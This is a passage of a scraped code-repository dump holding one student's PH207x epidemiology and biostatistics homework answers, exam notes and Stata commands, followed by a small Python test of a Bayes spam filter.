#####\n\n=> Incidence Rate Ratio= ?\n\n> Group | Incidence Rate\n> ------------- | -------------\n> II | 214/13191.79=0.01622221\n> I | 547/55384.42=0.00987642\n\nRate Ratio: RR= 0.01622221 / 0.00987642= **1.6425193**\n\n" }, { "alpha_fraction": 0.7494385838508606, "alphanum_fraction": 0.7529675960540771, "avg_line_length": 78.84615325927734, "blob_id": "4ce1c911336084bb02a9c09b78f5e4d80621511f", "content_id": "02caa5cb71f5ec9869f1d084857479ebaae48752", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3133, "license_type": "no_license", "max_line_length": 774, "num_lines": 39, "path": "/PH207x/homework/seven/Toxins and Parkinson's Disease Cohort Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Toxins and Parkinson's Disease Cohort Study#\n> An investigator, Dr. Park, is interested in evaluating whether there is an association between exposures to toxins and risk of developing Parkinson’s disease. She constructs a cohort of men and women that are living in her state in 1985 and every year, they are asked to complete a questionnaire about exposures at work and at home and whether they have been diagnosed with Parkinson’s disease. The participants in Dr. Park’s study contribute information on their changing toxin exposures over time for as long as they are residents in that state and for any year that they complete the questionnaire. As new people move into the state, they are enrolled in her cohort and remain in the cohort for as long as they are residents in the state and complete the questionnaire.\n\n#### 1.Should Dr. Park include people who reported that they had Parkinson’s at the time that they were recruited? ####\n> Yes \n> => **No** \n\n\n#### 2.Does Dr. Park need to be concerned about selection bias? 
####\n> => **Yes, if people who were at greater risk of developing Parkinson’s were more likely to be exposed and were also more likely to participate in the study** \n> No, because it is a prospective cohort study so selection biases are not a concern \n\n\n#### 3.If those who are exposed to toxins are more likely to drop out of the study and more likely to develop Parkinson’s disease, what effect with this have on the estimated relative risk compared to the true relative risk? ####\n> **Hint1:** I think the study hypothesis - there is an association btwn toxin and Parkinson, so the null is opposite to the study hypothesis i.e Ho= there is no association between the two. More exposed ppl are likely to develop the disease, and if these ppl drop out of the study, you will find the end result to be less ppl with the disease and likely to conclude there is no association btwn the two, which is, what do you think? away or towards or no effect to the Ho? \n> \n> No effect \n> => **Biased towards the null** \n> Biased away from the null \n\n\n#### 4.Is this an open cohort or closed cohort? Why? ####\n> Closed, because exposure at baseline is used for all follow-up \n> Open, because loss to follow-up and competing risks are still a problem in this population-based study \n> Closed, because risk ratios are the most appropriate measure to compare toxin levels and Parkinson’s risk \n> => **Open, because people can enter and exit the cohort over the follow up time of the study**\n\n#### 5.True or False: Based on the data collected in her study, Dr. Park will be able to calculate absolute measures of Parkinson’s disease incidence. ####\n> False \n> => **True** \n\n> Absolute risk (incidence, prevalence): \n> Incidence = number of new cases of a disease occurring in a specified time period divided by the number of individuals at risk of developing the disease during the same time\n\n#### 6.Because Dr. 
Park conducted a prospective cohort study instead of a cross-sectional study, she can be less concerned about ####\n> Confounding \n> Bias \n> => **Reverse causation** \n> Chance \n\n\n" }, { "alpha_fraction": 0.6956764459609985, "alphanum_fraction": 0.7379358410835266, "avg_line_length": 41.916168212890625, "blob_id": "6d355b7d8519ee54624943ae7b9cb7083f02c137", "content_id": "8472729dcca32a763a84cdda3b85fe77d112c20c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7211, "license_type": "no_license", "max_line_length": 550, "num_lines": 167, "path": "/PH207x/exam/exam_part1.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Infant Cry Time #\nIn this series of questions, we examine data from a study of 158 infants who visited Northbay Healthcare in Solano County, California for a Vitamin K shot. Assume that the infants in the study are a representative random sample from all infants in Northbay Healthcare. \n \nNurses administered a Vitamin K shot to each infant. Infants were randomized to two different protocols to study how to reduce pain experienced by the infants due to the shot. The infants were divided into two groups – the control group, where standard protocol for handling the infants was used; and an intervention group, where mothers held their infants prior to, during, and after administration of the shot. Pain was measured using the Neonatal Infant Pain Score (NIPS) (Lawrence et. al 1993). The variables in the dataset are described below: \n\n* id – unique identifier for each infant\n* group – 1 if intervention group, 0 if control\n* pain0 – NIPS score 0 seconds after shot\n* pain30 – NIPS score 30 seconds after shot\n* pain60 – NIPS score 60 seconds after shot\n* pain120 – NIPS score 120 seconds after shot\n* crytime – total time that the infant cried in seconds\n \nThese data were made available through SOCR . 
(www.socr.ucla.edu/) \n \nSource: Lawrence J, Alcock D, McGrath P, Kay J, MacMurray SB, Dulberg C. (1993) The development of a tool to assess neonatal pain, Neonatal Network, 12:59-66.\n\n\n## Exploratory Analysis ##\nBefore jumping into analyzing the babies.dta dataset, first explore the dataset using summary statistics and graphical analyses. \n\n1. Make a boxplot of cry time by group. According to the boxplot, which group has more variability in cry time? \n* **control**\n* intervention \n\n```stata\n\tgraph box crytime, by(group)\n```\n\n2. Using the central limit theorem, construct a 95% confidence interval for the average total cry time for infants in the control group and infants in the intervention group. For this question only, assume that the standard deviation of cry time within each group is known and is equal to 22 seconds. \n \n\nn=sample size= 158 \n \n```stata\n\tmean crytime, over(group)\n```\n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ] \n \n**Control** \n> Construct a 95% confidence interval for average total cry time for infants in the control group \n \n* Lower Bound: 34.351151 \n* Upper Bound: 44.053909 \n \nn=sample size= 79 \nσ=standard deviation= 22s \nx⁻=39.20253 \n```stata\n\tdi 39.20253 - 1.96*22/sqrt(79)\n\tdi 39.20253 + 1.96*22/sqrt(79)\n\tci crytime if group==0\n```\n \n**Intervention**\n> Construct a 95% confidence interval for infants in the intervention group \n \n* Lower Bound: 24.756211 \n* Upper Bound: 34.458969 \n \n```stata\n\tdi 29.60759 - 1.96*22/sqrt(79)\n\tdi 29.60759 + 1.96*22/sqrt(79)\n```\n\n## Two-sample Non-parametric Test ##\nNow, we examine the relationship between cry time and group among infants at Northbay. \n\n1. Suppose we wish to perform a two-sample test, but we do not want to make any normality (or other strong parametric) assumptions. Conduct an appropriate non-parametric test to test whether the distribution of cry time is the same in both groups at the 0.05 level of significance. 
\n \n```stata\n\tranksum crytime, by(group)\n```\n=> What is your p-value: **0.0080** \n \n**Your conclusion from the test?** \n* there is evidence that the *means* of the two groups are different (specifically, there is evidence that the mean is higher in the control group) \n* there is not evidence that the *means* of the two groups are different \n* none of the above \n\n2. Assuming randomization was successful and all participants complied with their assigned exposure, which of the following should we be concerned about: \n* Confounding by sex of the infant \n* Confounding by the amount of pain experienced by the infant \n* Effect modification by sex of the infant \n* Misclassification of the exposure status of the infant \n\n\n## Linear Regression ##\nIn the babies.dta full dataset, generate a covariate called painind defined as 1 if the infant experienced severe pain upon receiving the shot (pain0 = 7) and as 0 otherwise. In Stata, you can use the commands: \n \n```stata\n\tgenerate painind = 0\n\treplace painind = 1 if pain0 == 7\n```\n \nFit a linear regression model with total cry time as the outcome; and with group and painind (the severe pain indicator) as covariates. The regression model is: \n \n> Y_i = β_0 + β_1*group_i + β_2*painind_i + ε_i \n> where ε_i ~ N(0,σ²).\n\n1. **Using the notation from the model above, what are your estimates of the regression coefficients and residual standard deviation?** \n \n```stata\n\tregress crytime group painind\n```\n \n* β_0= **29.78**\n* β_1= **-7.679168**\n* β_2= **12.61215**\n* σ= **21.766**\n\n2. **Using the fitted regression model, estimate the average change in cry time for infants with severe pain versus those without severe pain, holding group constant. Provide a 95% confidence interval for this estimate.** \n \n```stata\n\tregress crytime group painind\n```\n \n* Estimate: **12.61215** \n* 95% Confidence interval Lower Bound: **5.235661**\n* 95% Confidence interval Upper Bound: **19.98863**\n\n3. 
**Again, use the notation above for the regression model. The correct interpretation for β_1 is:**\n \n* Infants in the intervention group have β_1 times the risk of experiencing an increase in cry time compared to infants in the control group \n* Infants in the intervention group have β_1 times the risk of experiencing an increase in cry time compared to infants in the control group after controlling for pain experienced by the infant \n* Infants in the intervention group on average have β_1 change in cry time compared to the control group. \n* Infants in the intervention group on average have β_1 change in cry time compared to the control group, after controlling for severity of pain experienced by the infant upon receiving the shot.\n\n\n4. **Using the regression model, estimate the average cry time in the following groups:**\n \n* Control group infants with severe pain upon receiving the shot: **42.3955**\n```stata\n\tregress crytime group if group==0 & painind==1\n```\n* Control group infants without severe pain upon receiving the shot: **29.7833**\n```stata\n\tregress crytime group if group==0 & painind==0\n```\n* Intervention group infants with severe pain upon receiving the shot: **34.7163**\n```stata\n\tregress crytime group if group==1 & painind==1\n```\n* Intervention group infants without severe pain upon receiving the shot: **22.1042**\n```stata\n\tregress crytime group if group==1 & painind==0\n```\n\n\n5. 
**Without using the regression model, estimate the mean cry time in the following groups:**\n \n* Control group infants with severe pain upon receiving the shot: **40.64407**\n```stata\n\tregress crytime group if group==0 & painind==1\n```\n* Control group infants without severe pain upon receiving the shot: **34.95**\n```stata\n\tregress crytime group if group==0 & painind==0\n```\n* Intervention group infants with severe pain upon receiving the shot: **36.91489**\n```stata\n\tregress crytime group if group==1 & painind==1\n```\n* Intervention group infants without severe pain upon receiving the shot: **18.875**\n```stata\n\tregress crytime group if group==1 & painind==0\n```\n\n\n\n" }, { "alpha_fraction": 0.6134928464889526, "alphanum_fraction": 0.6444001197814941, "avg_line_length": 47.467742919921875, "blob_id": "582597629eeee3afd9c60ad751a741b9c6fc1853", "content_id": "8722a79d4e9d1a65674faceeb4c3c2396fd34795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3009, "license_type": "no_license", "max_line_length": 343, "num_lines": 62, "path": "/PH207x/excercises/Lesson7/Odds Ratio.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Odds Ratio #\n> Suppose we have a disease (e.g. lung cancer) \n> And two groups (e.g. smokers, non-smokers) \n> \n> => Odds Ratio quantifies the relationship \n> \n> Relative odds (OR)= ( P(D|S)/(1-P(D|S)) ) / ( P(D|S_c) / (1-P(D|S_c)) ) \n> D is equal to disease \n> S is equal to smokers \n> S_c is equal to non-smokers\n\n## Theory for odds ratio ##\n\n | Exposed | Unexposed | Total\n---------- | ------- | --------- | ----- \nDisease | a | b | a+b\nNo Disease | c | d | c+d\nTotal | a+c | b+d | n\n\n> Relative odds (OR)= ( ^P(D|E)/(1-P^(D|E)) ) / ( ^P(D|E_c) / (1-^P(D|E_c)) ) \n> = (a/(a+c))/(c/(a+c)) / (b/(b+d))/(d/(b+d)) \n> = a*d / b*c\n\n> Approx. 
Normal: \n> ^se[ln(^OR)]= sqrt( 1/a + 1/b + 1/c + 1/d )\n\n## Berkson's Fallacy ##\nHe quantified the fallacy (sampling error)\n\n\n## Yule Effect (Simpson's Paradox) ##\n> Woman who could be classified as smokers/non-smokers in a 20 year follow-up of a one-in-six survey of the electoral roll in 1972-1974 in Whickham, UK.\n\n | Smokers | Non-Smokers | Total\n---------- | ------- | ----------- | ----- \nDead | 139 | 230 | 369\nAlive | 443 | 502 | 945\nMortality | 0.239 | 0.314 | 0.281\n\n> Use Decomposition Rule / Proportion / Mean \n> The composition is the story: You should not compare the means of two groups if the composition are different. Because you might just be confounding a lot of things together and blurring the issue at stake\n\n### Yule Effect Demonstration ###\n> Imagine you are a researcher studying YSS and the drugs that might prevent it. You decide to perform an experiment to test whether or not the promising drug Twoohsevenex is effective at preventing YSS. \n> \n> You perform a study by taking 200 men and 200 women, all of whom are at risk but do not currently have YSS, and separating them randomly into two groups. The \"treated\" group receives Twoohsevenex, while the control group recieves a placebo. \n> \n> At a follow up exam 5 years later, you observe the following results (Patients with YSS/All Patients in Category): \n> \n> Your results:\n\n | Treated | Control\n------ | ------- | -------- \nMen | 40/100 | 45/100\nWoman | 25/100 | 30/100\nTotal | 65/200 | 75/200\n\n> Your colleague, Doctor Drummond, insists that the results of his study of 2000 patients show that untreated patients do better on average than those recieving Twoohsevenex. \n> \n> Being a diligent statistician, you explore his results and find that within each sex/treatment group, his patients fared similarly to your own. Still, on the whole, his study showed that the untreated group did better. 
\n> \n> Use the sliders below to adjust the proportions of men and women in each group in a study of 2,000 people and find a case in which the aggregate performance of each treatment category makes it appear that Twoohsevenex is worse for patients than the placebo even though within each gender category, Twoohsevenex patients clearly fared better. \n\n\n" }, { "alpha_fraction": 0.7519999742507935, "alphanum_fraction": 0.7671111226081848, "avg_line_length": 92.5, "blob_id": "2d3e9e09df5cc4c136803d78688004bf659da352", "content_id": "b9296663f5ec74e15bc6d39d00a613202871a28d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1125, "license_type": "no_license", "max_line_length": 512, "num_lines": 12, "path": "/PH207x/homework/ten/Pesticide Exposure and Cancer.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Pesticide Exposure and Cancer #\nDr. Patel is interested in examining whether pesticide exposure is associated with a rare form of cancer. Since it is difficult to find enough cases to study, she decides to try and identify all cases in a large region. Since men and people younger than 50 are both more likely to be exposed to pesticides and more likely to develop this form of cancer, she obtains a random sample of people that did not develop the cancer living in the same region, matched to the case within 5 years of age and the same sex. \n \n##### 1. True or False: In this study, the matching eliminates the association between pesticide use and age. #####\n* True\n* False \n\n##### 2. First, Dr. Patel conducts an analysis that ignores the matching in the design and finds that the odds of developing cancer is 1.35 times greater among those exposed to the pesticide compared to those who were not exposed. If she then conducted another analysis that takes the matching into account, she would likely find an association of. 
#####\n* Less than 1.00 \n* 1.00 \n* Greater than 1.00 \n* Not enough information is provided \n\n\n" }, { "alpha_fraction": 0.7780026793479919, "alphanum_fraction": 0.7800269722938538, "avg_line_length": 91.5625, "blob_id": "0a1151b19d56772d531079a6053cb5908770ef3f", "content_id": "2b514489335fe80131c71c4276ee02e3dc8a19a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1482, "license_type": "no_license", "max_line_length": 381, "num_lines": 16, "path": "/PH207x/homework/nine/Coping and Outcomes after Surgery Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Coping and Outcomes after Surgery Study ##\n> Dr. Spencer is conducting a study to evaluate whether better coping styles are associated with improved outcomes after undergoing surgery. He is concerned that people with better coping styles have other healthy lifestyle factors and more social support that also impact post-surgery prognosis.\n\n#### 1. True or False: Because people cannot be randomized to a particular coping style, Dr. Spencer cannot test his hypothesis in a randomized controlled trial to assure that the correct counterfactual outcomes can be compared properly. Therefore, there is no way to evaluate this question.####\n* Yes\n* => **No**\n\n#### 2. Dr. Spencer chooses to draw a directed acyclic graph (DAG), which is useful because ####\n\n* It prevents confounding so that stratification is not necessary. \n* => **It helps the researcher evaluate the relationship between the factors under study to decide when stratification or statistical adjustment is appropriate.**\n* It addresses issues of chance and how that impacts the results of a stratified analysis.\n\n#### 3. True or False: In terms of examining whether there is a causal effect of exposure on outcome, Dr. Spencer wants to make sure that the risk of poor post-surgery prognosis is similar for all factors other than coping styles. 
This is important to achieve exchangeability to conclude that differences in coping styles is causing the differences in the risk of the outcome. ####\n* => **Yes**\n* No\n\n" }, { "alpha_fraction": 0.707733690738678, "alphanum_fraction": 0.7316147685050964, "avg_line_length": 56.45454406738281, "blob_id": "0c7443d7b15ddb1e1541ebb528a8d32afa7c559c", "content_id": "58d44f37243e9a8515a64486e139c33276b57233", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6323, "license_type": "no_license", "max_line_length": 802, "num_lines": 110, "path": "/PH207x/exam/exam_part2.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Prospective Cohort Study #\n> Please note: All students have different numbers in the tables below. Every student has a different exam. Make sure the answers that you submit correspond to your tables, or the answers will be marked incorrect. \n\nThe following tables show the crude and sex-specific results from a Prospective Cohort Study that examines the association between a binary exposure (E) and the development of a disease (D) during 20 years of follow-up. \n \nD - Development of a disease \nE - Binary exposure\n\n## Full Data: ##\n\n | D+ | D- | Total | Estimated Risk\n------ | -- | --- | ----- | ---------------\n E+ | 40 | 160 | 200 | 40/200=0.2\n E- | 20 | 180 | 200 | 20/200=0.1\n Total | 60 | 340 | 400 | \n\n## Sex-Specific Data: ##\n\n* **Males** \n | D+ | D- | Total | Estimated Risk\n------ | -- | --- | ----- | ---------------\n E+ | 8 | 32 | 40 | 8/40=0.2\n E- | 8 | 72 | 80 | 8/80=0.1\n Total | 16 | 104 | 120 | \n\n* **Females** \n | D+ | D- | Total | Estimated Risk\n------ | -- | --- | ----- | ---------------\n E+ | 32 | 128 | 160 | 32/160=0.2\n E- | 12 | 108 | 120 | 12/120=0.1\n Total | 44 | 236 | 280 | \n\n\n1. **Assume that this cohort is a simple random sample from a broader population of interest. 
Model the number of disease positive individuals among all exposed individuals in the sample using the binomial distribution with probability of disease p^e+; and model the number of disease positive individuals among the unexposed in the sample using a binomial distribution, with probability of disease p^e-. Estimate p^e+, the proportion of exposed individuals who are disease positive, and provide an exact 95% confidence interval.** \n \n* Estimated Proportion:\n* Confidence Interval - Lower Bound:\n* Confidence Interval - Upper Bound:\n\nmean = n*p\nvariance = n*p*(1-p)\n\nExample: The proportion of people in the population with the disease (the prevalence) is 15%, then P(Y=1)=0.15 and P(Y=0)=0.85.\nIf we take a random sample of 5 people from this population, there will be 0,1,2,3,4, or 5 people with the disease.\nIf the probability of disease in each person is independent, then we can write down the probability of each of these outcomes even before we draw the sample.\n\n\n\n- Model the number of disease positive individuals among all exposed individuals in the sample using the binomial distribution with probability of disease p^e+;\n- Model the number of disease positive individuals among the unexposed in the sample using a binomial distribution, with probability of disease p^e-\n- Estimate p^e+, the proportion of exposed individuals who are disease positive, and provide an exact 95% confidence interval.\n\n\n2. **Would you expect the large-sample Wilson confidence interval to provide similar results to the exact confidence intervals in question 1?**\n* Yes\n* No\n\n3. **Consider the following hypothetical scenario. Suppose that the data generating mechanism was different, and the data were generated from a stratified random sample of the population, where the probability of disease varies by stratum and the sampling probabilities vary by stratum. For instance, suppose the sampling was stratified by gender, where males were oversampled. 
Would the binomial model described in question 1 still be appropriate for estimating the proportion of diseased positive individuals in the population within exposure groups? (Model the number of disease positive individuals among all exposed individuals in the sample using the binomial distribution; and model the number of disease positive individuals among the unexposed in the sample using a binomial distribution).**\n* Yes\n* No\n\n\n4. **Now, we examine the risk difference between the exposed and unexposed populations. Estimate the risk difference for the disease and construct a corresponding large-sample 95% confidence interval. Calculate the risk difference as the proportion of diseased individuals in the exposed minus the proportion of diseased individuals in the unexposed.**\n \n* Risk Difference: \n* Confidence Interval - Lower Bound:\n* Confidence Interval - Upper Bound:\n\n5. **Conduct a two-sample proportion test that the risk difference is equal to zero (versus the alternative that the risk difference is not equal to zero) at the 0.05 level of significance.**\n* What is the absolute value of the test statistic?\n* What is the distribution of the test statistic under the null hypothesis?\n\t* Standard Normal \n\t* t-distribution \n\t* Binomial \n* What is the p-value?\n* What is your conclusion? (enter the letter of your best answer from the options listed below)\n\t* (A) We have evidence that the risk difference is not equal to 0.\n\t* (B) We do not have evidence that the risk difference is different from zero.\n\t* (C) None of the above.\n\n6. **Rather than testing that the risk difference is equal to 0 (as in question 5), could you have conducted a Pearson-chi square test to test for an association between disease and exposure?**\n* Yes\n* No\n\n\n7. **What is the value for the Crude Risk Ratio, comparing exposed subjects to non-exposed subjects?**\n\n\n8. 
**Using the Mantel-Haenszel formula, what is the value for the sex-adjusted Risk Ratio, comparing exposed subjects to non exposed subjects?**\n\n\n9. **Using the total data as a standard population, what is the value for the Standardized Risk Ratio?**\n\n\n10. **Is sex a confounder in this study? (enter the letter of your best answer from the options listed below)**\n* (A) Yes, because the crude RR equals the sex-adjusted RR\n* (B) No, because the crude RR equals the sex-adjusted RR\n* (C) Yes, because the crude RR does not equal the sex-adjusted RR\n* (D) No, because the crude RR does not equal the sex-adjusted RR\n* (E) Yes, because the RR among the males equals the RR among the females\n* (F) No, because the RR among the males equals the RR among the females\n\n\n11. **Using the Risk Ratio as a measure of association, is sex an effect modifier in this study?**\n* Yes, because the crude RR equals the sex-adjusted RR \n* No, because the crude RR equals the sex-adjusted RR \n* Yes, because the crude RR does not equal the sex-adjusted RR \n* No, because the crude RR does not equal the sex-adjusted RR \n* Yes, because the RR among males equals the RR among females \n* No, because the RR among males equals the RR among females \n\n\n" }, { "alpha_fraction": 0.7518247961997986, "alphanum_fraction": 0.7546322345733643, "avg_line_length": 52.90909194946289, "blob_id": "3d366f87260dd45164f4231e8c6aaa30c90f15cc", "content_id": "2b3d3070ae41a6201836776c2b2db24ac6804ce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 384, "num_lines": 33, "path": "/PH207x/homework/eight/Alcohol Consumption and Cancer Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Alcohol Consumption and Cancer Study #\n> Dr. Marks is interested in examining the association between alcohol consumption and a rare form of cancer. 
Since it is hard to identify cases, Dr. Marks designs a case-control study. Cases are identified from cancer treatment centers across the United States. Controls are selected on the day that the case is diagnosed with cancer from among the relatives of the cancer patient. \n> \n> Good Link: http://www.ciphi.ca/hamilton/Content/content/resources/explore/fb_case_v_cohort.html\n\n#### 1. True or False: Dr. Marks should make sure to select the healthiest relative as the control to ensure that he will observe differences in risk between cases and controls. ####\n\n* True\n* False \n\n#### 2. The main concern of using relatives of cases as the controls is that #### \n\n* Some cases may not have relatives that drink alcohol. \n* NOPE: Some cases may have relatives that live far away so not all relatives will be available to participate. \n* Relatives of cases may be more likely to have levels of alcohol consumption that are more similar to the cases than the population that gave rise to the cancer cases. \n* NOPE: The controls may develop other diseases and will not be available to participate in this study. \n\n#### 3. Based on the study description above, Dr. Marks conducted a #### \n\n* Density case-control study \n* Nested case-control study \n* Case-cohort study \n* Retrospective cohort study \n\n#### 4. True or False: Using this design, a relative who served as a control cannot be included as a case if he later develops the cancer of interest. #### \n\n* True\n* False \n\n#### 5. True or False: Using the data collected in this study, Dr. Marks will be able to estimate the rates for developing this cancer. 
#### \n\n* True\n* False \n\n" }, { "alpha_fraction": 0.5186915993690491, "alphanum_fraction": 0.5887850522994995, "avg_line_length": 21.621212005615234, "blob_id": "68853642fb51557df76778f7591a524e3f9c97b0", "content_id": "a11baed527c38a039f1815ee59e89ad8229fad62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 146, "num_lines": 66, "path": "/PH207x/excercises/Lesson7/One Sample Binomial Model.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Categorical Data #\n\n## One Sample Binomial Model ##\n> p = probability of success \n> n = number of trials\n> mean = n*p \n> sd = sqrt( mean*(1-p) )\n> X = number of successess\n\n> We have to calculate the left probability!\n\n### Estimator of p ###\n> n trials, x successes= SUM i=1 to n d_i\n> where d_i = 1 if i_th trial is a success, \n> = 0 if i_th trial is a failure \n> \n> ^p= x/n= 1/n * SUM i=1 to n d_i\n\n\n## Inference for p ##\nIs approximately normal with mean p and standard deviation sqrt(p*(1-p)/n)\n\n### Standardization ###\n> Z = (^p - p) / sqrt(p*(1-p)/n)\n\n\n### Wald Estimator ###\n> Z = (^p - p) / sqrt(^p*(1-^p)/n)\n\n### Exact ###\nWe will do this later\n\n### Confidence Intervals (Wilson Methode) ###\n> So approximate CI, solve for ps that satisfy\n\n\tsumm death angina hospmi stroke cvd hyperten diabetes1\n\n## Hypothesis Testing for P ##\n\n> H_0: p=0.082 \n> n= 52 \n> p-value= 0.384\n> \n> Z= (^p - p) / sqrt(p*(1-p)/n) \n> = 0.115 - 0.082 / sqrt(0.082*(1-0.082)/52) \n \n> 6= 6 successes \n \n\tprtesti 52 6 0.082 , count\n\n### Exact test ###\n\n\tbintesti 52 6 0.082\n\n\n## Sample Size Estimation ##\n> Suppose we wish to test the hypothesis H_0: p <= 0.082 at the alpha=0.01 level, and we want power of 0.95 at p=0.2. How big a sample do we need?\n\n> For alpha=0.01 the z=2.32. So since \n> Z= (^p - p) / sqrt(p*(1-p)/n) \n> ^p= ? and n=? 
\n \n> a Z of 2.32 corresonds to a ^p of: \n> ^p = 0.082 + 2.32*sqrt(0.082*0.918/n)\n\n\tsampsi 0.082, alpha(0.01) power(0.95) onesamp oneside\n\n\n\n\n\n" }, { "alpha_fraction": 0.5809601545333862, "alphanum_fraction": 0.6615134477615356, "avg_line_length": 42.85714340209961, "blob_id": "fc4370d686a27d4667b43d155610d7f6ba721596", "content_id": "a38db7d40de35c7e0954b263724b35938bf50b92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1229, "license_type": "no_license", "max_line_length": 216, "num_lines": 28, "path": "/PH207x/homework/six/Nursing Home Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Nursing Home Study#\nSuppose that 500 residents of a large nursing home are screened for hypertension. All residents with above a specified level are labeled as having hypertension. The following table displays the results of this study.\n\nNursing Home Study Results\n | Hypertension | No Hypertension | Total | Risk \n------ | ------------ | --------------- | ------- | -------\nMale | 100 | 100 | 200 | 100/200\nFemale | 100 | 200 | 300 | 100/300\n\n\n1. Which of the following measures of association would be the most appropriate to use to describe the finding in this study? \n\n> Cumulative Ratio \n> Incidence Rate Ratio \n> => **Prevalence Ratio**\n\n2. What is the prevalence of hypertension among all residents? \n> prevalence of hypertension = (total number of people with hypertension)/(total number of people in study) \n> prevalence of hypertension = 200/500= 0.4\n\n3. 
What is the prevalence odds ratio for having hypertension comparing male residents (exposed group) to female residents (non-exposed group)?\n> Prevalence odds= prev/1-prev \n> R1= 100/200= 0.5 \n> R2= 100/300= 0.33333333 \n> R1/(1-R1)= 1 \n> R2/(1-R2)= 0.49999999 \n\n> => R1/R2= 1/0.49999999= **2**\n\n" }, { "alpha_fraction": 0.6100082993507385, "alphanum_fraction": 0.6476426720619202, "avg_line_length": 40.60344696044922, "blob_id": "341a126db333b879183dfa8cdc64d0c9107751c0", "content_id": "599b8feacf80ed1481e02f325842610069cca863", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2418, "license_type": "no_license", "max_line_length": 209, "num_lines": 58, "path": "/PH207x/homework/seven/Contingency Tables.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Contingency Tables #\n> Continue using the Fergusson et al. (2012) clinical trial data to complete the following questions. Again, use either the dataset from the previous question, hw7.dta, or the study results in the table below.\n\nOutcome | Standard Protocol | Fresh Blood\n--------------------------- | ----------------- | ------------\nNecrotizing enterocolitis | 15 | 15\nIntraventricular hemorrhae | 11 | 18\nRetinopathy of prematurity | 26 | 23\nBronchopulmonary dysplasia | 63 | 60\nDeath | 31 | 30\nComposite Outcome | 100 | 99\nTotal Sample Size | 189 | 188\n\n#### 1. Estimate the odds ratio and a 95% confidence interval for experiencing the composite outcome for those in the fresh blood group versus standard protocol blood group. 
#### \n> **Hint1:** exposed = fresh blood unexposed = standard protocol \n> **Hint2:** composite outcome not composite outcome (all the other entries)\n\n> OR Estimate: **0.99**\n\n> 95% Confidence Interval: **[0.6607011,1.483424 ]**\n\n\n> I used: \n\n\tcs fresh outcome, or woolf\n\n\n\n##### Is there evidence of an association between blood group and the composite outcome (at the 0.05 level of significance). ##### \n> Yes \n> => **No** \n\n\ttabulate outcome fresh, expected chi2\n\n\n#### 2. Construct a 2x2 table for the composite outcome versus blood group. Are the expected cell counts large enough to conduct a Pearson Chi-square test? #### \n\n\ttabplot outcome fresh\n\n#### 3. Using the Pearson chi-square test, determine if there is evidence of an association between blood group and the composite outcome at the level of significance. #### \n> (To answer this question, either use the hw7.dta dataset OR explore using the csi command by typing \"db csi.\") \n\n\ttabulate outcome fresh, expected\n\tcsi 100 99 98 98, or woolf\n\n##### What is the value of the test statistic? Round your answer to two decimal places. ######\n> chi2(1) = **0.00**\n\n##### What is the null distribution of the test statistic? ##### \n> => **Chi-square distribution with 1 degree of freedom**\n> Binomial distribution\n\n##### What is the p-value? ##### \n> Pr>chi2 = **0.9602**\n\n##### What is the conclusion? 
#####\n> => **No evidence of an association between fresh and standard groups**\n> Evidence of an association between fresh and standard groups \n\n\n\n\n" }, { "alpha_fraction": 0.7340877056121826, "alphanum_fraction": 0.7355021238327026, "avg_line_length": 31.090909957885742, "blob_id": "f1acf8446e7f4dd5cd304a4c646fd51f44b4be1a", "content_id": "23c2454fbc3378ed461ad26a0c1e062beee0fc27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 707, "license_type": "no_license", "max_line_length": 109, "num_lines": 22, "path": "/AI-Class/Algorithms-Python/BayesFilter/tests.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "from BayesFilter import BayesFilter\n\n## Example data taken from Stanford AI video class (Unit 5 Machine Learning)\n## http://www.ai-class.org\n\nfilter = BayesFilter()\n\n## Add some messages we flagged as spam\nfilter.addDoc(\"offer is secret\", \"spam\")\nfilter.addDoc(\"click secret link\", \"spam\")\nfilter.addDoc(\"secret sports link\", \"spam\")\n\n## Add some messages we did not flag\nfilter.addDoc(\"play sports today\", None)\nfilter.addDoc(\"went play sports\", None)\nfilter.addDoc(\"secret sports event\", None)\nfilter.addDoc(\"sports is today\", None)\nfilter.addDoc(\"sports costs money\", None)\n\nfilter.db.info()\n\nprint \"Probability of spam, given message 'today is secret' = %s\" % filter.predict(\"spam\", \"today is secret\")\n\n" }, { "alpha_fraction": 0.5666199326515198, "alphanum_fraction": 0.5862552523612976, "avg_line_length": 27.625, "blob_id": "92a1a054fc10dac4518e9150cf679ef8e1c57fd0", "content_id": "036f9c18e94327be49e81dbb69fb92d7d6b5de8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 68, "num_lines": 24, "path": 